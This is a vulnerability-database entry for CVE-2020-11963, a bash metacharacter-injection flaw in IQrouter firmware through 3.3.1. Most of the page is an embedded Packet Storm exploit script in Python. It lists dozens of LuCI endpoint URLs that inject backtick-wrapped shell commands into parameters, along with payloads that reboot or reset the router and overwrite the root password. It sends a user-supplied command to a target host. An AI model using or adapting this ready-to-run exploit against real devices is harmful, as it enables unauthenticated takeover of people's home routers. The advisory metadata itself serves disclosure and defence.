ID CVE-2020-11963Type cveReporter cve@mitre.orgModified 2020-04-24T12:56:00
Description
IQrouter through 3.3.1, when unconfigured, has multiple remote code execution vulnerabilities in the web-panel because of Bash Shell Metacharacter Injection.
{"id": "CVE-2020-11963", "bulletinFamily": "NVD", "title": "CVE-2020-11963", "description": "IQrouter through 3.3.1, when unconfigured, has multiple remote code execution vulnerabilities in the web-panel because of Bash Shell Metacharacter Injection.", "published": "2020-04-21T13:15:00", "modified": "2020-04-24T12:56:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-11963", "reporter": "cve@mitre.org", "references": ["https://evenroute.com/", "https://pastebin.com/grSCSBSu"], "cvelist": ["CVE-2020-11963"], "type": "cve", "lastseen": "2020-04-25T12:50:43", "history": [{"bulletin": {"affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cvelist": ["CVE-2020-11963"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "IQrouter through 3.3.1, when unconfigured, has multiple remote code execution vulnerabilities in the web-panel because of Bash Shell Metacharacter Injection.", "edition": 1, "enchantments": {"dependencies": {"modified": "2020-04-23T04:12:50", "references": [{"idList": ["PACKETSTORM:157300"], "type": "packetstorm"}], "rev": 2}, "score": {"modified": "2020-04-23T04:12:50", "rev": 2, "value": 3.3, "vector": "NONE"}}, "hash": "793dcf00a0bec7f7770f4c5ceba99c0123cf385b55d39bf4f6ed42d7748e40d3", "hashmap": [{"hash": "d45a893fd88890dce7238ba1a98414f2", "key": "href"}, {"hash": "47b3c192f5ea596e04675409efdd78fb", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "b067a31ea9c65c0db4d28a45051e6835", "key": "published"}, {"hash": "76bc63a24fbf99c01f342ec53de60760", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "41826addac1bdba6ed2c77669abd9f91", "key": "modified"}, {"hash": "383abd2dd29b115a198ae13f583d625f", "key": "references"}, {"hash": "be4240c0dc1f74ee8cb2cf2d73ebb178", "key": "cvelist"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-11963", "id": "CVE-2020-11963", "lastseen": "2020-04-23T04:12:50", "modified": "2020-04-21T13:21:00", "objectVersion": "1.3", "published": "2020-04-21T13:15:00", "references": ["https://evenroute.com/", "https://pastebin.com/grSCSBSu"], "reporter": "cve@mitre.org", "title": "CVE-2020-11963", "type": "cve", "viewCount": 1}, "differentElements": ["cvss", "cvss2", "modified", "cwe", "affectedSoftware"], "edition": 1, "lastseen": "2020-04-23T04:12:50"}], "edition": 2, "hashmap": [{"key": "affectedSoftware", "hash": "56c79b848a2c9e313ba60bc1ec9bf66f"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpe23", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvelist", "hash": "be4240c0dc1f74ee8cb2cf2d73ebb178"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "cvss2", "hash": "e63509ce8b627fb239a5a63969122026"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "934ce29157a6d45c8431abcaa5060724"}, {"key": "description", "hash": "47b3c192f5ea596e04675409efdd78fb"}, {"key": "href", "hash": "d45a893fd88890dce7238ba1a98414f2"}, {"key": "modified", "hash": "ef7c715c3706503bc0aac70acd2fbfa1"}, {"key": "published", "hash": "b067a31ea9c65c0db4d28a45051e6835"}, {"key": "references", "hash": "383abd2dd29b115a198ae13f583d625f"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "76bc63a24fbf99c01f342ec53de60760"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "b04d793169c7d8d4c217375ac88db0dc014741a3f16a0834c552de39af6c8ce2", "viewCount": 18, "enchantments": {"dependencies": {"references": [{"type": "packetstorm", "idList": ["PACKETSTORM:157300"]}], "modified": "2020-04-25T12:50:43", "rev": 2}, "score": {"value": 3.3, "vector": "NONE", "modified": "2020-04-25T12:50:43", "rev": 2}, "vulnersScore": 3.3}, "objectVersion": "1.3", "cpe": [], "affectedSoftware": [{"name": "evenroute iqrouter_firmware", "operator": "le", "version": "3.3.1"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": [], "cwe": ["CWE-78"], "scheme": null}
{"packetstorm": [{"lastseen": "2020-04-25T08:10:07", "bulletinFamily": "exploit", "description": "", "modified": "2020-04-21T00:00:00", "published": "2020-04-21T00:00:00", "id": "PACKETSTORM:157300", "href": "https://packetstormsecurity.com/files/157300/IQrouter-3.3.1-Remote-Code-Execution.html", "title": "IQrouter 3.3.1 Remote Code Execution", "type": "packetstorm", "sourceData": "`# Exploit Title: IQrouter 3.3.1 Firmware - Remote Code Execution \n# Date: 2020-04-21 \n# Exploit Author: drakylar \n# Vendor Homepage: https://evenroute.com/ \n# Software Link: https://evenroute.com/iqrouter \n# Version: IQrouter firmware up to 3.3.1 \n# Tested on: IQrouter firmware 3.3.1 \n# CVE : N/A \n \n#!/usr/bin/env python3 \nimport argparse \nfrom sys import argv, exit \n \ntry: \nimport requests \nexcept ImportError: \nprint(\"Install requests lib! pip3 install requests\") \n \n \nprint(\"\"\" \n####################################################################### \n# IQrouter multiple RCE and other vulnerabilities # \n# by drakylar (Shaposhnikov Ilya) # \n# CVE-2020-11963 CVE-2020-11964 CVE-2020-11966 # \n# CVE-2020-11967 CVE-2020-11968 # \n####################################################################### \n\"\"\") \n \n \nrce_setup = [ \n[ \n\"/cgi-bin/luci/er/vlanTag?vlan_tag='`{}`'\", \n\"RCE /vlanTag (vlan_tag param)\" \n], \n[ \n\"/cgi-bin/luci/er/verify_wifi?wifi_conflict='`{}`'\", \n\"RCE /verify_wifi (wifi_conflict param). Need hide_wifi_config != true\" \n], \n[ \n\"/cgi-bin/luci/er/screen9?save_creds=1&s1&s2='`{}`'&p1&p2\", \n\"RCE /screen9 (s2 param)\" \n], \n[ \n\"/cgi-bin/luci/er/screen9?save_creds=1&s1='`{}`'&s2&p1&p2\", \n\"RCE /screen9 (s1 param)\" \n], \n[ \n\"/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1&p2='`{}`'\", \n\"RCE /screen9 (p2 param)\" \n], \n[ \n\"/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1='`{}`'&p2\", \n\"RCE /screen9 (p1 param)\" \n], \n[ \n\"/cgi-bin/luci/er/screen4?save_isp='`{}`\", \n\"RCE /screen4 (save_isp param)\" \n], \n[ \n\"/cgi-bin/luci/er/screen2?set_wan_modem_interfaces='`{}`'\", \n\"RCE /screen2 set_wan_modem_interfaces param)\" \n], \n[ \n\"/cgi-bin/luci/er/screen2?find_ip_address_conflict='`{}`'\", \n\"RCE /screen2 find_ip_address_conflict param)\" \n], \n[ \n\"/cgi-bin/luci/er/screen10?set_security_question='`{}`'\", \n\"RCE /screen10 (set_security_question param)\" \n], \n[ \n\"/cgi-bin/luci/er/screen10?set_security_answer='`{}`'&set_security_question=1\", \n\"RCE /screen10 (set_security_answer param)\"], \n[ \n\"/cgi-bin/luci/er/screen1?zonename='`{}`'\", \n\"RCE /screen1 (zonename param)\" \n], \n[ \n\"/cgi-bin/luci/er/register?email=`{}`\", \n\"RCE /register (email param, result in /cgi-bin/luci/er/get_syslog for result)\" \n] \n] \n \nrce_any = [ \n[ \n\"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2='`{}`'&p1=1&p2=1\", \n\"RCE /wifi (s2 param)\" \n], \n[ \n\"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1='`{}`'&s2=5&p1=6&p2=7\", \n\"RCE /wifi (s1 param)\" \n], \n[ \n\"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1=3&p2='`{}`'\", \n\"RCE /wifi (p2 param)\" \n], \n[ \n\"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1='`{}`'&p2=4\", \n\"RCE /wifi (p1 param)\" \n], \n[ \n\"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=`{}`&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7\", \n\"RCE /wifi (guestwifi_5g_ssid param)\" \n], \n[ \n\"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=`{}`&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7\", \n\"RCE /wifi (guestwifi_2g_ssid param)\" \n], \n[ \n\"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key='`{}`'&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=2&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7\", \n\"RCE /wifi (guest_key param)\" \n], \n[ \n\"/cgi-bin/luci/er/wifi?enable_guestwifi='`{}`'&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=5&s2=6&p1=6&p2=7\", \n\"RCE /wifi (enable_guestwifi param)\" \n], \n[ \n\"/cgi-bin/luci/er/screen11.1?email=`{}`®ister=123&uilog=123&bg=123\", \n\"RCE /screen11.1 (email param)\" \n], \n[ \n\"/cgi-bin/luci/er/reboot_link?link='`{}`'\", \n\"RCE /reboot_link (link param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_wifi/1/2/3/4/5/'`{}`'/\", \n\"RCE /diag_wifi (htm5ghz param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_wifi/1/2/3/4/'`{}`'/6/\", \n\"RCE /diag_wifi (htm2ghz param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_wifi/1/2/3/'`{}`'/5/6/\", \n\"RCE /diag_wifi (c5ghz param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_wifi/1/2/'`{}`'/4/5/6/\", \n\"RCE /diag_wifi (c2ghz param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_set_static_wan/'`{}`'/2/3/4/\", \n\"RCE /diag_set_static_wan (static_ip param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_set_static_wan/1/'`{}`'/3/4/\", \n\"RCE /diag_set_static_wan (net_mask param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_set_static_wan/1/2/'`{}`'/4/\", \n\"RCE /diag_set_static_wan (gateway param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_set_static_wan/1/2/3/'`{}`'/\", \n\"RCE /diag_set_static_wan (dns param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_set_static_modem/'`{}`'/2/3/\", \n\"RCE /diag_set_static_modem (static_ip param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_set_static_modem/1/'`{}`'/3/\", \n\"RCE /diag_set_static_modem (net_mask param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_set_static_modem/1/2/'`{}`'/\", \n\"RCE /diag_set_static_modem (gateway param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_set_device_name_and_sync/'`{}`'/\", \n\"RCE /diag_set_device_name_and_sync (device_name param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_set_device_name/'`{}`'/\", \n\"RCE /diag_set_device_name (device_name param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_pppoe_update/'`{}`'/passs/\", \n\"RCE /diag_pppoe_update (wan_username param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_pppoe_update/aaadmin/'`{}`'/\", \n\"RCE /diag_pppoe_update (wan_password param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_pppoe/'`{}`'/passsswd/\", \n\"RCE /diag_pppoe (wan_username param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_pppoe/aaadmin/'`{}`'/\", \n\"RCE /diag_pppoe (wan_password param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_pppoa_update/'`{}`'/paaaasword/\", \n\"RCE /diag_pppoa_update (wan_username param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_pppoa_update/aaadmin/'`{}`'/\", \n\"RCE /diag_pppoa_update (wan_password param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_pppoa/'`{}`'/passs/\", \n\"RCE /diag_pppoa (wan_username param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_pppoa/aaadmin/'`{}`'/\", \n\"RCE /diag_pppoa (wan_password param)\" \n], \n[ \n\"/cgi-bin/luci/er/advanced_link?link='`{}`'\", \n\"RCE /advanced_link (link param)\" \n] \n \n] \n \nadvanced_payloads = [ \n[ \n\"/cgi-bin/luci/er/reboot_link?reboot=1\", \n\"Reboot IQrouter (/reboot_link reboot param))\" \n], \n[ \n\"/cgi-bin/luci/er/screen2?reboot=1\", \n\"Reboot IQrouter (/screen2 reboot param))\" \n], \n[ \n\"/cgi-bin/luci/er/index?reset_config=1\", \n\"Reset IQrouter (/index reset_config param)\" \n], \n[ \n\"/cgi-bin/luci/er/screen7?upgrade=1\", \n\"Upgrade IQrouter (/screen7 upgrade param)\" \n], \n[ \n\"/cgi-bin/luci/er/vlanTag?restart_network=1\", \n\"Restart network (/vlanTag restart_network param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_iperf_cmd/start\", \n\"Start iperf script (/diag_iperf_cmd/start)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_iperf_cmd/stop\", \n\"Stop iperf script (/diag_iperf_cmd/stop)\" \n], \n[ \n\"/cgi-bin/luci/er/get_syslog\", \n\"Router setup info log (/get_syslog)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_set_password/c00lpasswd/\", \n\"Change root password to c00lpasswd (can change in code)\" \n], \n[ \n\"/cgi-bin/luci/er/reset_password/\", \n\"Change root password to 'changeme' (static)\" \n] \n] \n \n \ndef print_payloads(): \nprint('#' * 30) \nprint(\"Payloads list\") \nnum = 1 \nprint('######################### RCE without auth ########################') \nfor payload in rce_any: \nprint(\"{} - {}\".format(num, payload[1])) \nnum += 1 \n \nprint( \n'############### RCE (router need to be in setup mode) ###############') \nfor payload in rce_setup: \nprint(\"{} - {}\".format(num, payload[1])) \nnum += 1 \n \nprint( \n'######################### Advanced payloads #########################') \nfor payload in advanced_payloads: \nprint(\"{} - {}\".format(num, payload[1])) \nnum += 1 \n \n \nparser = argparse.ArgumentParser(description=\"IQrouter multiple RCE\") \nparser.add_argument('--host', help='Host', type=str) \nparser.add_argument('-p', '--port', help='Web port (default: 80)', default=80, type=int) \nparser.add_argument('-n', '--num', help='Payload number', \ndefault=0, type=int) \nparser.add_argument('-c', '--cmd', help='Command to execute (default: pwd)', \ndefault=\"pwd\", type=str) \nparser.add_argument('--protocol', help='Protocol (http/https)', \ndefault=\"http\", type=str) \n \nargs = parser.parse_args() \n \n \ndef main(): \nprint(\"\") \nfull_payload_list = rce_setup + rce_any + advanced_payloads \npayloads_amount = len(full_payload_list) \ntry: \nhostname = args.host \nport = args.port \npayload_num = int(args.num) \nbash_cmd = args.cmd \nprotocol = args.protocol \n \nif payload_num < 1 or payload_num > payloads_amount: \nprint(\"Error with payload number!\") \nraise IndexError \nif port < 0 or port > 65535: \nprint(\"Error with port number\") \nraise IndexError \nif protocol not in ['http', 'https']: \nprint(\"Error with protocol name\") \nraise IndexError \n \ncurrent_payload = full_payload_list[payload_num - 1] \nprint(\"Payload: {}\".format(current_payload[1])) \nprint(\"Host: {}\".format(hostname)) \nprint(\"Port: {}\".format(port)) \nprint(\"Protocol: {}\".format(protocol)) \nprint(\"Command: {}\".format(bash_cmd)) \n \nfull_url = \"{}://{}:{}{}\".format(protocol, hostname, port, \ncurrent_payload[0].format(bash_cmd)) \nprint(\"Built URL: {}\".format(full_url)) \n \nr = requests.get(full_url) \nprint(\"Status code: {}\".format(r.status_code)) \nreturn \nexcept IndexError: \nparser.print_help() \nprint_payloads() \nexit(1) \n \n \nif __name__ == '__main__': \nprint( \n\"\\n\\nWarning: use TABS(doesn't work in some payloads) or ${IFS} for space.\") \nexit(main()) \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/157300/iqrouter331-exec.txt"}]}
